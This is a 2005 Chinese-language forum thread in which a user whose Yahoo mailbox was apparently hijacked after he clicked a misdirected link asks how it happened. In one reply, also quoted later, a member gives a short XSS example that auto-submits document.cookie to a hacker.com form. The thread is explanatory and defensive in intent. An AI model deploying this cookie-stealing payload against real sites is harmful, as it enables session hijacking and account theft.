網域名稱俱樂部

返回   網域名稱俱樂部 > 其他 > 影音及閑聊測試區
刷新本頁 我的信箱被入侵了!!!!
論壇幫助 社區 日曆事件 今日新文章 搜尋

回覆
 
主題工具
  #1  
舊 2005-04-05, 01:54 AM
domainplayer domainplayer 目前離線
進階會員
  
註冊日期: 2002-05-31
文章: 4,757
發送 ICQ 消息給 domainplayer
預設 我的信箱被入侵了!!!!

我今天用我yahoo的信箱收了一封寄錯email,
內容是某個線上論壇啟動帳號的連結網址...
基於幫助那位打錯email的老兄...我就自行點擊了.... (那時沒去仔細看網址)
結果yahoo mail的網頁跳出一個警告,警告我說我正將自己的資訊傳送出去....
我沒多想就按了確定...
進入那個連結後它卻顯示"有太多人同時在線上,目前網站無法回應"
然後我就關掉視窗沒去管它...

經過了十多小時,
我剛剛再次登入我的yahoo信箱收信,
卻發現email被刪了十多封,連原來那封確認信都不見了(所以無法追查網址..)
而且有些我根本沒閱讀過的信都變已閱讀狀態,
我被入侵是既成事實....
裡面有一堆網址帳戶的密碼........
不知有沒有被盜用了...
但願那位賊人不懂domain name

我實在太不小心啦

我最好奇的一點是....
有可能透過點擊網址而將自己yahoo的密碼傳送出去嗎?
若不行的話...那當時跳出的警告可能是將什麼資料給傳送出去??
__________________
1515
回覆時引用此篇文章
  #2  
舊 2005-04-05, 01:57 AM
哈啦 的頭像
哈啦 哈啦 目前離線
論壇管理員
  
註冊日期: 2002-05-28
文章: 23,056
預設
webmail如何把你的資料送出去?不是需要有執行檔嗎?可是在yahoo的信箱中執行不了啊?
你確定真是那封信的關係?
__________________
咖啡走路
微博

您是網站站長嗎?歡迎到站長俱樂部 一起討論吧。
按我看版規
code.club
回覆時引用此篇文章
  #3  
舊 2005-04-05, 02:03 AM
domainplayer domainplayer 目前離線
進階會員
  
註冊日期: 2002-05-31
文章: 4,757
發送 ICQ 消息給 domainplayer
預設
引用:
作者: 哈啦
webmail如何把你的資料送出去?不是需要有執行檔嗎?可是在yahoo的信箱中執行不了啊?
你確定真是那封信的關係?
我不知道,我點擊了那個認證連結後yahoo email立即跳出一個小的警告視窗,說我正要把資訊傳送出去,我也很納悶... 為何點個連結而已會出現那個警告?

我也不確定是不是那封信,是因為那封信被刪掉了 (連垃圾桶都找不到,其它被刪的信在垃圾桶裡還找得到),所以才做此推測...
__________________
1515
回覆時引用此篇文章
  #4  
舊 2005-04-05, 02:09 AM
哈啦 的頭像
哈啦 哈啦 目前離線
論壇管理員
  
註冊日期: 2002-05-28
文章: 23,056
預設
快改網名的相關密碼吧。
__________________
咖啡走路
微博

您是網站站長嗎?歡迎到站長俱樂部 一起討論吧。
按我看版規
code.club
回覆時引用此篇文章
  #5  
舊 2005-04-05, 02:32 AM
Ricado 的頭像
Ricado Ricado 目前離線
進階會員
  
註冊日期: 2004-07-13
住址: 蕃薯島,打狗城
文章: 4,456
預設
引用:
webmail如何把你的資料送出去?不是需要有執行檔嗎?可是在yahoo的信箱中執行不了啊?
你確定真是那封信的關係?
不管是cgi, asp, jsp或是php,很多時候都會以Http Get的方式傳送,也就是網址後面接一串參數,這本身就有風險。

再來則是使用者登入信箱後,帳號密碼已經寫在cookie,只要透過一些技巧就可以將cookie偷走。如果【盡職】一點的工程司會將cookie加密,混一點的就直接名碼儲存。以下是一個常用的技巧

代碼:
<a href=http://www.domain.club.tw/welcome.asp?name=
    <FORM action=http://www.hacker.com/data.asp method=post id=“idForm”>
      <INPUT name=“cookie” type=“hidden”> 
    </FORM>
    <SCRIPT>
       idForm.cookie.value=document.cookie; 
       idForm.submit();
    </SCRIPT> >
here
</a>
回覆時引用此篇文章
  #6  
舊 2005-04-05, 08:19 AM
robowang robowang 目前離線
進階會員
  
註冊日期: 2004-05-22
文章: 372
預設
對方是偷你的 cookie
然後你連結進去看到所謂 "有太多人同時在線上,目前網站無法回應"
我猜那大概是假的訊息, 你任何時後連過去, 都是顯示這個訊息
讓你以為沒連結成功, 應該不會發生什麼事,
但其實 .....
回覆時引用此篇文章
  #7  
舊 2005-04-05, 09:05 AM
seesawgame 的頭像
seesawgame seesawgame 目前離線
進階會員
  
註冊日期: 2004-07-25
住址: 域名家.com
文章: 6,551
預設
那會不會是一個釣魚網站?!
亦或是論壇被植入病毒或後門且連站長也不知道(我就遇過這樣的站,站長是個電腦白痴,卻被種東西在她的站)
__________________
回覆時引用此篇文章
  #8  
舊 2005-04-05, 09:56 AM
domainplayer domainplayer 目前離線
進階會員
  
註冊日期: 2002-05-31
文章: 4,757
發送 ICQ 消息給 domainplayer
預設
引用:
作者: Ricado

不管是cgi, asp, jsp或是php,很多時候都會以Http Get的方式傳送,也就是網址後面接一串參數,這本身就有風險。

再來則是使用者登入信箱後,帳號密碼已經寫在cookie,只要透過一些技巧就可以將cookie偷走。如果【盡職】一點的工程司會將cookie加密,混一點的就直接名碼儲存。以下是一個常用的技巧

代碼:
<a href=http://www.domain.club.tw/welcome.asp?name=
    <FORM action=http://www.hacker.com/data.asp method=post id=“idForm”>
      <INPUT name=“cookie” type=“hidden”> 
    </FORM>
    <SCRIPT>
       idForm.cookie.value=document.cookie; 
       idForm.submit();
    </SCRIPT> >
here
</a>
感謝Ricado兄詳細解說!
我想應該是這個樣子沒錯...
以後再也不敢隨便亂開來路不明的信了
幸好沒被改密碼...
__________________
1515
回覆時引用此篇文章
  #9  
舊 2005-04-05, 11:51 AM
dx2 dx2 目前離線
進階會員
  
註冊日期: 2003-12-02
文章: 1,590
發送 MSN 消息給 dx2 發送 Yahoo! 消息給 dx2
預設
你可以請服務供應廠商查一下登入你帳號的資料,如果真如你說的,那啞x的信箱可能有風險,你提供給他們,相信他們會很重視的。
回覆時引用此篇文章
回覆

« 上一主題 | 下一主題 »

發文規則
不可以發表新主題
不可以發表回覆
不可以上傳附件
不可以編輯自己的文章
啟用 BB 代碼
論壇啟用 表情符號
論壇啟用 [IMG] 代碼
論壇禁用 HTML 代碼


所有時間均為 +8。現在的時間是 08:28 AM

聯繫我們 - domainclub.org - 論壇存檔 - 返回頂端

本站主機由網易虛擬主機代管
Powered by vBulletin® 版本 3.8.4
版權所有 ©2000 - 2024,Jelsoft Enterprises Ltd.